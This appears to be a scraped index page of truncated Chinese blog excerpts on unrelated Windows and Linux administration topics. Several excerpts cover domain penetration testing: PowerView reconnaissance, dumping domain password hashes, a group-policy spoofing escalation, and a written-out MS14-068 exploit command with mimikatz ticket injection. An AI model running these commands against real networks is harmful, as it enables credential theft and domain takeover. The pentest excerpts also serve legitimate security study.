# 安装DFS 命名空间.DFS 管理工具.DFS 复制# author:lttr <www.cnblogs.com/GoCircle> # date:2019-08-09 # eg. # setupdfs.ps1 -servers ("WIN01","WIN02") [CmdletBinding()] param ( # DFS成员列表 [Parameter(Mandatory=$)][String[]]$servers ) foreach ($ser…

POwershell收集域内信息 Powershell(你可以看做CMD的升级版 但是和cmd完全不一样) 原来的powershe是不能执行任何脚本的 更改执行策略 这个是一个绕过的脚本 接下来我们了解一下 Powerview脚本 https://github.com/PowerShellMafia/PowerSploit 接下来是一些命令的演示 先让Powershell可以执行ps脚本 PS C:\Users\Administrator> Get-ExecutionPolicy Restric…

上次我们建立了WSUS实现了更新管理,那么现在我们需要的是让集群内的客户机(之后会建立在hyper-v集群上)和服务器都能装上三个软件 1. Microsoft Team 2. Notepad++ 3. Microsoft Edge 这三个软件的镜像可以从网上下载,当然如果你不想找的话,我这里上传到百度云上供大家下载 链接:https://pan.baidu.com/s/1HIJtwgN-tH9WewN_s98CfQ 提取码:k5kd 解压密码:SteinGateAmadeu 下载完之后把这三个…

搭建域环境 操作系统: 域控:Windows server 2008 R2    域成员: Windows Server 2012 . Windows 7 对于将要安装成为DC的服务器来讲,其系统配置以及基本的磁盘规划在此就不在累述了,但是关键的网络连接属性是必须要注意的.可以通过打开本地连接的属性来进行配置其IP属性.作为服务器DC的IP地址一定要是静态的IP地址,虽然不一定需要配置默认网关,但是DNS服务器指向一定要配置正确,因为AD的工作是紧密依赖于DNS服务的.本实例中整个微软网络环境都…

0x00目标: 导出当前域内所有用户的hash 0x01测试环境: 域控:server2008 r2 杀毒软件:已安装* 域控权限:可使用net use远程登陆,不使用3389 0x02测试方法: (1)mimikatz: hash数量:只能抓取登陆过的用户hash,无法抓取所有用户 免杀:需要免杀 (2)pwdump: hash数量:无法抓取所有用户 免杀:需要免杀 (3)vssown.vbs + libesedb + NtdsXtract hash数量:所有用户 免杀:不需要 优点: 获得信…

0x01 漏洞起源 说到ms14-068,不得不说silver ticket,也就是银票.银票是一张tgs,也就是一张服务票据.服务票据是客户端直接发送给服务器,并请求服务资源的.如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器.所以ms14-068的来源和银票是息息相关的. 在mimikatz作者的ppt里面是这样描述的: 所以说这真的是一个大漏洞,允许域内任何一个普通用户,将自己提升至域管权限.微软给出的补丁是kb3011780.在server 2000以上的…

本文转自先知社区,原文链接:https://xz.aliyun.com/t/2527#toc-10 原文地址:https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes <h1>在渗透测试的过程中,当我们已经是域管权限时,就可以实现提取所有域内用户的密码哈希以进行离线破解和分析,这是非常常见的一个操作.这些哈希值存储在域控制器(NTDS.DIT​​)中的数据库文件中,并带有一些其他信息,如组中成员身份和用户.</h1…

首次远程安装 GlassFish 服务后,如果以远程 Web 方式访问其后台管理系统,会提示 Secure Admin must be enabled to access the DAS remotely 错误.管理系统的默认管理员账号为 admin,密码为空,但这时远程登录就会提示上面的错误,只有在 GlassFish 所在的服务器上以本地浏览器访问 http://locahost:4848 才能以默认空密码访问管理系统.那么如果 GlassFish 所在的服务器不具备远程图形界面访问的条件呢…

记录线下Powershell在域环境中对于服务器的信息收集 Powershell的脚本有很多,在内网渗透测试中不仅能扫,能爆,能转发,还能做更多的事情.我们常用的脚本有Powersploit,Empire,PowerView等等. 使用脚本之前,我们先科普下计算机上的执行策略,输入下面命令. get-executionpolicy Restricted------默认的设置,不允许任何script运行 AllSigned-------只能运行经过数字证书签名的script RemoteSigne…

使用VNC远程安装CentOS 7操作系统 by 无若 数据中心一般都不在本地,如果希望重新安装系统,难道还要跑到数据中心...所以必须要有一种方式来远程解决这个问题. 目前CentOS 7主要使用的引导方式是grub2,这与过去的grub1差别其实是很大的. 1. 确定你的网卡名称,IP等相关信息 # 查看 IP地址及网卡信息[root@localhost /]# ip a1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state…

从前的小米盒子299给了父母用,前段时间天猫搞活动,99撸了一个天猫魔盒,天猫亲爹阿里真是有钱任性.由于广电总局各种规定,当然也有盒子厂商的利益,默认很多片是需要付费观看的,而且也看不了电视直播.所以必须自己折腾下才能用的舒心. 记得以前小米盒子有个远程安装APP功能,挺方便的,在天猫魔盒上找了N久还是没找到,网上搜索了下大部分是类似重复的内容: 在电脑上下载APP放到U盘里. U盘连接盒子 然后安装 好麻烦的样子,或许是我太前卫 了吧,N久没用过U盘了,唯一一个U盘也不在身边,这种方式也太反人…

原创地址:http://www.cnblogs.com/jfzhu/p/4022999.html 转载请注明出处 AD域内需要有DNS服务器,用于解析域内的计算机名,但是域内的计算如何解析公网的域名呢?当然一种方式是将域内每台计算机都额外添加一个公共DNS服务器:另外一种比较简便的方法就是在域内DNS服务器上增加一个转发器(Forwarder). 演示环境使用的是Windows 2008,两台计算机在同一域内,一台是DNS服务器,另一台是其他用途的计算机,下面演示如何设置DNS服务器,使得另一台…

Linux下的网络远程安装 1.用RHEL6.5光盘安装第一台服务器 2.在第一台服务器上配置YUM服务器 先创建一个挂载 #mount #umount /dev/cdrom #mkdir /mnt/rhel-dvd #vim /etc/fstab /dev/sr0 /mnt/rhel-dvd iso9660 defaults,ro #mount -a //挂载所有列出在/etc/fstab里面但当前还未挂载的文件系统 rpm需要手动处理包依赖关系 YUM能够自动处理包依赖关系,为此需要配置YU…

TFTP:Trival File Transfer Protocol,简单文件传输协议.是TCP/IP协议族中的一个用来在客户机与服务器之间进行简单文件传输的协议,提供不复杂.开销不大的文件传输服务.端口号为69. TFTP和FTP的区别 1.FTP用TCP协议,TFTP用UDP协议2.FTP支持用户认证,TFTP不支持3.FTP文件大小没有限制,TFTP有限制,32MB大小4.TFTP仅仅支持下载和上传(get/put)两个操作 TFTP用于网络远程安装 网络远程安装流程: 开机自检->网卡B…

普通域用户通过远程桌面登录DC: 1)将该用户加入到 Remote Desktop Users 组中…

通过pymysql模块调用数据库获取安装信息,通过paramiko模块远程传输脚本并执行来安装软件,本文以安装apache为例. 创建apache安装信息数据表install_apache,设定三个字段,一个ip地址,一个root用户密码,一个是否已安装状态码,如下: use python; ),passwd ),status )); 插入数条数据信息(数据是造的,条件所限,只有192,168.100.100是真机,然并卵),设定192,168.100.100这台机器还没有安装apache in…

POWERSHELL处理域中计算机的过程 由于集团公司规模较大,存在几个分公司并处在不同地理位置.采用域集中管理,各分公司都有自己的域控制器,分别负责各分公司的DNS解析,DHCP地址分配,及客户端登录. 现在有这样一个需求: 将各分公司计算机按操作系统类型归类存放到指定OU中,以便于部署域策略. 在没有SCCM的情况下,听说POWERSHELL可以做到,于是就试了一下,觉得可行.并将操作思路和执行过程记录下来. 1. 通过各分公司的DHCP服务器导出各网段中的所有计算机输出到EXCEL中处理只…

局域网内远程连接OPC配置方法详解 https://wenku.baidu.com/view/20fb8ea6d1d233d4b14e852458fb770bf78a3bcc.html   OPC服务器是如何被找到的? https://blog.csdn.net/kkus123/article/details/80296468   OPC DCOM配置过程中常见问题及其处理 https://wenku.baidu.com/view/8d4674e181c758f5f61f679b.html…

 可以让任何域内用户提升为域管理员     c:\python27\python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.localmimikatz.exe "kerberos::ptc TGT_k8test3@k8.local.ccache" exit       ms14-068.py Exploits…

OSPF域内路由故障-现象与排障思路 一.故障现象 OSPF的或内路由故障常表现为邻居路由器不通告部分或全部路由,可能的原因通常为: 1).拟通告的接口上未启用OSPF 2).拟通告的接口被关闭 OSPF是一种基于链路状态的内部网关路由协议,存在链路状态数据库,在运行了OSPF的路由中需要重点关注邻居表.链路状态数据库(也叫链路状态表).路由表.如果邻居不通告某条路由,那么这条路由将无法显示在本地路由器的路由表和OSPF链路状态数据库中.同时, 这也表示邻居没有把这条路由包含到它自己的OSPF链…

Android 使用 adb命令 远程安装apk ./adb devices 列出所有设备 ./adb connect 192.168.1.89 连接到该设备 ./adb logcat 启动logcat ./adb install -r /Users/streetpoet/Desktop/MytvPauselive.apk 将本地apk安装到远程机器 ./adb uninstall <package> eg: package like com.spstudio.mytv    …

VirtualBox内刚刚安装完Debian9系统,也无法设置共享文件夹.解决的方法就是安装VirtualBox客户端增强包. 1.若直接安装客户端增强包会得到如下提示:root@debian:/opt# ./VBoxLinuxAdditions.run Verifying archive integrity... All good.Uncompressing VirtualBox 5.1.34 Guest Additions for Linux...........VirtualBox Gue…

VirtualBox内刚刚安装完CentOS6.9和7系统,无法调整屏幕的分辨率,也无法设置共享文件夹.解决的方法就是安装VirtualBox客户端增强包. 1.若直接安装客户端增强包会得到如下提示:[root@CentOS opt]# ./VBoxLinuxAdditions.run Verifying archive integrity... All good.Uncompressing VirtualBox 5.1.34 Guest Additions for Linux.........…

原文: UWP项目生成安装包远程安装在树莓派上 哎,好纠结啊!如果这个名字写的太长,会显得太繁琐,如果写的短又好像说不清楚,我这语言表达水平实在是令人担忧啊!不过应该能够明白啥意思吧!因为对这个感兴趣的会点进来的应该都是玩这个的,所以应该是没有二义性的吧! 我想还是再说明一下这篇文章是干啥的,会比较好吧!这篇文章写的就是怎样把写好的UWP项目打包成一个安装包,然后把这个安装包安装在树莓派上.因为我刚开始接触这个UWP相关的东西,感觉这方面的资料比较少,而且遇到问题问人的话,基本上找不到可问的人,…

0x01 漏洞利用 在目标主机域用户口令已知的条件下,目标主机在进行策略更新时,对域服务器的认证存在漏洞,攻击者劫持认证服务器的过程,引导至伪造的域服务器,并在域服务器中制定用户的计划任务策略,可以获取该主机的最高控制权限. 在域服务器离线时,域内主机使用域用户登录后,策略更新时,认证域服务器时存在漏洞,只通过用户的口令散列值进行认证.如果提前知道域用户口令,在伪造域服务器中添加相同的用户.设置相同的口令,则可以伪造新的域策略向主机推送,从而实现权限提升.策略变更(例如常见的关闭防火墙等) 该漏…

Oracle 11g 基于CentOS7静默安装教程(无图形界面,远程安装) [转载]原文地址:http://canonind.blog.51cto.com/8239025/1883066 一.安装前环境准备 1.  VMware Workstation 10 搭建 CentOS 7 x64位虚拟机,CentOS7操作系统最小化安装,2G内存,20G磁盘空间,1核CPU,已配置好网络IP:192.168.1.30 2.  已下载Oracle 11gLinux安装文件:linux.x64_11gR…

安装MSI包 使用PowerShell调用WMI对象,你可以执行下面的脚本来安装你的MSI安装包: $box="deviis01" #this is the name of your server $product= [WMICLASS]"\\$box\ROOT\CIMV2:win32_Product" Write-Host "Installing software on $box" $product.Install("c:\Setup…

原文:http://blog.csdn.net/jasper_success/article/details/7984065 第一步:使用java.net的URLConnection对象来创建连接 第二步:通过InputStream将下载的文件写入存储卡内缓存 第三步:下载完毕之后,通过自定义的openFile()方法打开文件,判断文件类型,若为APK,开始安装 第四步:准备离开Installer程序的同时,通过自制的delFile()方法,删除缓存内文件 /** * 远程下载安装Android…

远程主机IP:192.168.122.1 远程主机名:server1.example.com 本地主机IP:192.168.122.2 本地主机名:server2.example.com 1.登录到远程主机上,通过virt-install建立虚拟机 [root@server2 ~]$ ssh root@192.168.122.1 [root@server1 -]# virt-install --prompt --vnc --vncport=6000 --vnclisten=192.168.122…

什么是 Azure PowerShell? Azure PowerShell 是一组模块,提供用于通过 Windows PowerShell 管理 Azure 的 cmdlet.你可以使用 cmdlet 来创建.测试.部署和管理通过 Azure 平台传送的解决方案和服务.在大多数情况下,这些 cmdlet 可让你执行在 Azure 经典管理门户中可以执行的任务,例如,创建和配置云服务.虚拟机.虚拟网络和 Web 应用. 步骤 1:安装 . 登录https://www.azure.cn/downl…